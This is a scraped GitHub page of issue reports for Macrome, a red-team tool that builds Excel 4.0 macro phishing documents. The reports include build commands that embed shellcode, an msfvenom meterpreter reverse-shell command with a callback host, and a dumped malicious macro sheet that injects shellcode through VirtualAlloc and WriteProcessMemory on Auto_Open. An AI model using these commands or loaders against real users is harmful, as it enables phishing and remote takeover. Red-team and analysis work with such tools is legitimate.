michaelweber / macrome Goto Github PK
View Code? Open in Web Editor NEWExcel Macro Document Reader/Writer for Red Teamers & Analysts
License: MIT License
Excel Macro Document Reader/Writer for Red Teamers & Analysts
License: MIT License
first thanks for sharing such great tool, but it crushes when using cobalstrike RAW Shellcode any idea why thanks
Hello @michaelweber first of all thanks for this amazing tool!
I am playing around with this tool and testing locally and all works and now when im onto Macros section, i read it can import your own created macros.
My macro_example.txt is this one :
=ALERT("Excel document is outdated")
=QUIT()
Macrome.dll build --decoy-document decoy_document.xls --payload macro_example.txt --payload-type Macro and i get this error:
Unhandled exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.InvalidOperationException: Sequence contains no elements
As it uses a basic very simple macro as you can see and i cant get it working if you can give me any clue or anything i would appreciate it, thanks @michaelweber
Hi,
Auto_open never triggers in Excel 2019 32 Bit (Language: Turkish) version.
I have tried it with both Macrome and the test macro below with International Macro Sheet. I am also sending the sample file attached.
=EXEC("notepad.exe")
=HALT()
Do you have any advice?
Does not work on office16 and 2019. x64 bit.
A crash occurs and it exits.
my command:
./Macrome build --decoy-document Docs/decoy_document.xls --payload Docs/popcalc.bin --payload64-bit Docs/popcalc64.bin
build file:
poc.zip
Hi. Great work! Does it need a specific version of dotnet sdk installed? I installed the latest one for windows on a Windows 10 VM and built it without issues. When I run the DLL with the command "dotnet macrome.dll --build etc etc etc..." I get an error stating that the version 2.0 is not installed on the machine and it gives me the URL to download it. It's no longer supported but I guess I can finde it somewhere but the question is "do I really need it?". Thanks!
I have no idea why this happens, but if you use the --password
flag, your decoy document can't have a normal embedded image. To get around this my example uses a tiled background, but that's not something you're going to use in a common phishing lure.
I get the following errors when trying to dump a malicious spreadsheet:
C:\Users\jm460\Downloads\macrome>Macrome.exe dump --path C:\Users\jm460\Downloads\macrome\deobfuscated.xls
BoundSheet8 (0x10 bytes) - flags: 0x0 | SheetType: Macrosheet | HiddenState: Visible | Name [unicode=False]: qUKYONz;
BoundSheet8 (0xE bytes) - flags: 0x0 | SheetType: Worksheet | HiddenState: Visible | Name [unicode=False]: Sheet1
BIFF RecordType: SupBook - Length: 4
BIFF RecordType: ExternSheet - Length: 14
Lbl (0x1D bytes) - flags: 0xB | fBuiltin: False | fHidden: True | Name [unicode=False]: _xlfn.BITXOR | Formula: #NAME?
Lbl (0x17 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: ajeZFUwb
Lbl (0x20 bytes) - flags: 0x20 | fBuiltin: True | fHidden: False | Name [unicode=False]: Auto_Open1uto_Open1 !AUTO_OPEN! | Formula: qUKYONz;!A1
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button144_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button145_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button146_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button147_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button148_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button149_Click
Lbl (0x17 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: cecvdVub
Lbl (0x17 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: ikXOTAkJ
Lbl (0x1B bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: JIpHQ | Formula: qUKYONz;!F1
Lbl (0x15 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: KtyKQp
Lbl (0x15 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: viaBBg
Formula[A1]: ACTIVATE("qUKYONz;")
Formula[F1]: ARGUMENT("KtyKQp",2)
Formula[A2]: JIpHQ("=RE"&"GIS"&"TER(CHAR(109)&CHAR(115)&CHAR(118)&CHAR(99)&CHAR(114)&CHAR(116), CHAR(103)&CHAR(101)&CHAR(116)&CHAR(101)&CHAR(110)&CHAR(118), ""CC"", ""ajeZFUwb"", , 1, 9)")
Formula[F2]: FORMULA(KtyKQp,F3)
Formula[A3]: ajeZFUwb("USERDOMAIN")
Formula[A4]: IF(ISNUMBER(SEARCH("64",GET.WORKSPACE(1))))
Formula[F4]: FORMULA("",F3)
Formula[A5]: JIpHQ("=RE"&"GIS"&"TER(CHAR(75)&CHAR(69)&CHAR(82)&CHAR(78)&CHAR(69)&CHAR(76)&""32"", CHAR(86)&CHAR(105)&CHAR(114)&CHAR(116)&CHAR(117)&CHAR(97)&CHAR(108)&CHAR(65)&CHAR(108)&CHAR(108)&CHAR(111)&CHAR(99), ""JJJJJ"", ""cecvdVub"", , 1, 9)")
Formula[F5]: RETURN()
Formula[A6]: SET.VALUE(C6,0)
Formula[A7]: SET.VALUE(C7,65536)
Formula[A8]: WHILE(C6=0)
Formula[A9]: SET.VALUE(C7,C7+8192)
Formula[A10]: cecvdVub(C7,1024,12288,64)
Formula[A11]: SET.VALUE(C6,A10)
Formula[A12]: NEXT()
Formula[A13]: JIpHQ("=RE"&"GIS"&"TER(CHAR(75)&CHAR(69)&CHAR(82)&CHAR(78)&CHAR(69)&CHAR(76)&""32"",CHAR(87)&CHAR(114)&CHAR(105)&CHAR(116)&CHAR(101)&CHAR(80)&CHAR(114)&""oces""&CHAR(115)&CHAR(77)&CHAR(101)&CHAR(109)&CHAR(111)&CHAR(114)&CHAR(121),""JJJCJE"",""viaBBg"",,1,9)")
Unhandled exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.InvalidOperationException: Stack empty.
at System.Collections.Generic.Stack1.ThrowForEmptyStack() at System.Collections.Generic.Stack
1.Pop()
at b2xtranslator.xls.XlsFileFormat.PtgHelper.GetFormulaStringInner(Stack1& ptgStack, Boolean showAttributes) in C:\Users\Weber\source\repos\michaelweber\Macrome\b2xtranslator\Xls\XlsFileFormat\PtgHelper.cs:line 255 at b2xtranslator.xls.XlsFileFormat.PtgHelper.GetFormulaString(Stack
1 ptgStack, Boolean showAttributes) in C:\Users\Weber\source\repos\michaelweber\Macrome\b2xtranslator\Xls\XlsFileFormat\PtgHelper.cs:line 370
at b2xtranslator.Spreadsheet.XlsFileFormat.Records.Formula.ToFormulaString(Boolean showAttributes) in C:\Users\Weber\source\repos\michaelweber\Macrome\b2xtranslator\Xls\XlsFileFormat\Records\Formula.cs:line 261
at Macrome.BiffRecordExtensions.ToHexDumpString(BiffRecord record, Int32 maxLength, Boolean showAttrInfo) in C:\Users\Weber\source\repos\michaelweber\Macrome\BiffRecordExtensions.cs:line 85
at Macrome.Program.Dump(FileInfo path, Boolean dumpAll, Boolean showAttrInfo, Boolean dumpHexBytes) in C:\Users\Weber\source\repos\michaelweber\Macrome\Program.cs:line 85
--- End of inner exception stack trace ---
at System.RuntimeMethodHandle.InvokeMethod(Object target, Object[] arguments, Signature sig, Boolean constructor)
at System.Reflection.RuntimeMethodInfo.UnsafeInvokeInternal(Object obj, Object[] parameters, Object[] arguments)
at System.CommandLine.Invocation.ModelBindingCommandHandler.d__8.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Invocation.InvocationPipeline.<>c__DisplayClass4_0.<b__0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__20_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c__DisplayClass15_0.<b__0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c__DisplayClass24_0.<b__0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c__DisplayClass22_0.<b__0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__21_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__19_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__11_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__10_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c__DisplayClass13_0.<b__0>d.MoveNext()
Macro provided by Excelntdonut using -- obfuscate on excelntdonut, says formula is too long maximum character 255
Decoy documents should be able to have any number of sheets - right now it's essentially hard coded to assume the sheet is in position 1. This should be fixed.
Build arg like :.\Macrome.exe build --decoy-document 1.xls --payload payload.bin --payload-method Base64 --method ArgumentSubroutines --password VelvetSweatshop --output-file-name ReadyToPhish11.xls on win11,x64 version
Hi,
I tried to used - and get error about format of cells - I take screenshots:
https://ibb.co/TBR5bP5
https://ibb.co/HNScKb1
then GoTo and contents of cell with error are
=FORMULA($FE$512;$A$1)
Command for generate - very basic:
Macrome.exe build --decoy-document decoy_document.xls --payload popcalc.bin --output-file-name CharSubroutine-Macro_calc32.xls
OS version and Excel - Windows 10, Excel 2016 32bit.
I do not know what else to add, except for what I can do PoC from the article https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/ for calc32 or for Metasploit - on the same machine and Excel .
like id =1 , blankGraph.
in ms document , record enum begin at 6.................
can u guys propose some help infomation about where these record name (and field info) from.....thanks for this code inspire
It appears that some of my Unicode fun for obfuscating the Auto_Open label doesn't fly on the MacOS version of office. It should be possible to disable the obfuscation (which currently ALWAYS happens regardless of what you call your label) with a flag. I suspect this also is breaking auto_open functionality for some international language settings.
how to use this with putty than popcalc or metalsploit payload generated?
msfvenom -a x86 -b '\x00' -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=1123 EXITFUNC=thread -f raw > t86.bin
dotnet Macrome.dll build --decoy-document decoy_document.xls --payload t86.bin
When I open output.xls, it crashes when I enable macros
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.